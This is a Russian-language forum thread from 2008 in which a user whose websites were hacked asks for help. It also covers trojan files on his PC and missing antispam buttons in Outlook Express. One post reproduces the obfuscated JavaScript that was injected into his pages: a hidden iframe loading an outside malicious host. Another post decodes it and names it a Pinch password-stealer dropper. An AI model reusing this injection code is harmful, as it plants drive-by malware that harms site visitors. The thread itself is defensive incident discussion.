NoAdmin 0 Опубликовано 4 апреля, 2008 Автор Share Опубликовано 4 апреля, 2008 н-даа и по каким помойкам Вас носило....новье (хорошо, что это решаемо) Где только не носило Все это скорее всего от взломанного ПО скачанного с инета. Цитата Ссылка на сообщение Поделиться на другие сайты
akoK 138 Опубликовано 4 апреля, 2008 Share Опубликовано 4 апреля, 2008 Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки. P>S> Все уехало в вирлаб. Цитата Ссылка на сообщение Поделиться на другие сайты
NoAdmin 0 Опубликовано 4 апреля, 2008 Автор Share Опубликовано 4 апреля, 2008 (изменено) Может и от сайта зараженного, от ПО только одну версию можно получить, а через инет только актуальные новинки. Логично. На днях "взломали/украли пароли/др.варианты" мои сайты В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода: <script type="text/javascript"> document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e'); </script> И у меня еще проблема: В C:\Documents and Settings\Admin (основной пользователь) время от времени появляется файл WIN.EXE , вирусов вроде нет, в процессы не лезет, я его удаляю, а он снова... win.rar Восстановление значка "Свернуть все окна": Создай текстовый файл и туда скопируй: [shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop После сохраняй как Свернуть все окна.scf А лучше пользуйтесь WinKey+D - проще Изменено 4 апреля, 2008 пользователем NoAdmin Цитата Ссылка на сообщение Поделиться на другие сайты
Vsoft 13 Опубликовано 4 апреля, 2008 Share Опубликовано 4 апреля, 2008 Скиньте вредоноса мне в ЛС . Цитата Ссылка на сообщение Поделиться на другие сайты
akoK 138 Опубликовано 4 апреля, 2008 Share Опубликовано 4 апреля, 2008 win.exe - Trojan.Win32.Agent.jjh Цитата Ссылка на сообщение Поделиться на другие сайты
NoAdmin 0 Опубликовано 4 апреля, 2008 Автор Share Опубликовано 4 апреля, 2008 win.exe - Trojan.Win32.Agent.jjh KIS отдыхает Осталось найти путь его появления. Поможете? Цитата Ссылка на сообщение Поделиться на другие сайты
akoK 138 Опубликовано 4 апреля, 2008 Share Опубликовано 4 апреля, 2008 Почему, это по версии касперского. Цитата Ссылка на сообщение Поделиться на другие сайты
NoAdmin 0 Опубликовано 4 апреля, 2008 Автор Share Опубликовано 4 апреля, 2008 (изменено) Почему, это по версии касперского. У меня KIS 7.0.0.125 de с базами от 4.04.08 8:20 - не определяет а с базами 4.04.08 19:22 - определяет, Убедили! Изменено 4 апреля, 2008 пользователем NoAdmin Цитата Ссылка на сообщение Поделиться на другие сайты
vidocq89 27 Опубликовано 4 апреля, 2008 Share Опубликовано 4 апреля, 2008 (изменено) В корневой директории и в директории форума все файлы были модифицированы добавлением к конце страницы следующего кода:<script type="text/javascript"> document.write('\u003c\u......'); </script> хм... расшифровываться как: <iframe src=http://atomakayan*.biz*/afterftpchek/0104/index.php width=1 height=1 style="display:none"></iframe> и грузиться в теории этот файл: atomakayan.biz/my/load***.exe (звездочки в код я вставил специально, что бы никто нечаянно не сделал контрл+с и контрл+в и ентер. т.е код - без них))) файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный.... Изменено 4 апреля, 2008 пользователем vidocq89 Цитата Ссылка на сообщение Поделиться на другие сайты
NoAdmin 0 Опубликовано 5 апреля, 2008 Автор Share Опубликовано 5 апреля, 2008 (изменено) - Пропали значки "Спам", "Не спам" в Outlook Express Удаление KIS и повторная установка - результат не дали. Изменено 5 апреля, 2008 пользователем NoAdmin Цитата Ссылка на сообщение Поделиться на другие сайты
akoK 138 Опубликовано 5 апреля, 2008 Share Опубликовано 5 апреля, 2008 файл (если верить касперу - сейчас лень было качать и ковырять) - пинч обыкновенный.... Пинч...значит пароли тю-тю...необходимо менять. baseeopiq32.dll - Trojan.Win32.SubSys.ca Цитата Ссылка на сообщение Поделиться на другие сайты
NoAdmin 0 Опубликовано 5 апреля, 2008 Автор Share Опубликовано 5 апреля, 2008 Пинч...значит пароли тю-тю...необходимо менять. Да последнее время только этим и занимаемся! Спасибо! - Пропали значки "Спам", "Не спам" в Outlook Express Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило Цитата Ссылка на сообщение Поделиться на другие сайты
JIABP 222 Опубликовано 5 апреля, 2008 Share Опубликовано 5 апреля, 2008 Обновление KIS 7.0.0125 до 7.0.1.325 - ситуацию не исправило Добро пожаловать на форум! У меня была похожая проблема. Непомню как решил, но попропую посоетовать то, что делал я сам. Для начала Настройки-> Антиспам-> "Включить поддержку MS Outlook и т.д." и "Открывать Диспетчер писем при получении почты" галки снимаем. Далее ставим по умолчанию в панели управения почтовый клиент офис аутлук (если есть МС Офис), перезагружаемся. Потом ставим обратно галки в каспере которые сняли ранее, ставим обратно почтовый клиент по умолчанию аутлук экспресс, и запускаем его и смотрим. Цитата Ссылка на сообщение Поделиться на другие сайты
NoAdmin 0 Опубликовано 5 апреля, 2008 Автор Share Опубликовано 5 апреля, 2008 (изменено) Добро пожаловать на форум! Спасибо! Снял птицы в KIS Открыл Оутлук Офис - установил почтой по умолчанию Перезагрузка ОС Установил птицы в KIS Открыл Оутлук Экспресс - установил почтой по умолчанию Перезагрузил Безрезультатно Помогло только: Удалить Касперского утилитой http://http://forum.kasperskyclub.ru/index...ost&id=4321 и снова установите 325ю или новее Вопрос снят Всем Спасибо Изменено 5 апреля, 2008 пользователем NoAdmin Цитата Ссылка на сообщение Поделиться на другие сайты
JIABP 222 Опубликовано 5 апреля, 2008 Share Опубликовано 5 апреля, 2008 NoAdmin, поздравляю с решением проблемы! = ) Но ссылка которую Вы дали ведёт на главную страницу = ( Можно конкретную линку? P.S. Спасибо, буду знать как лечить данную траблу в будущем = ) Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.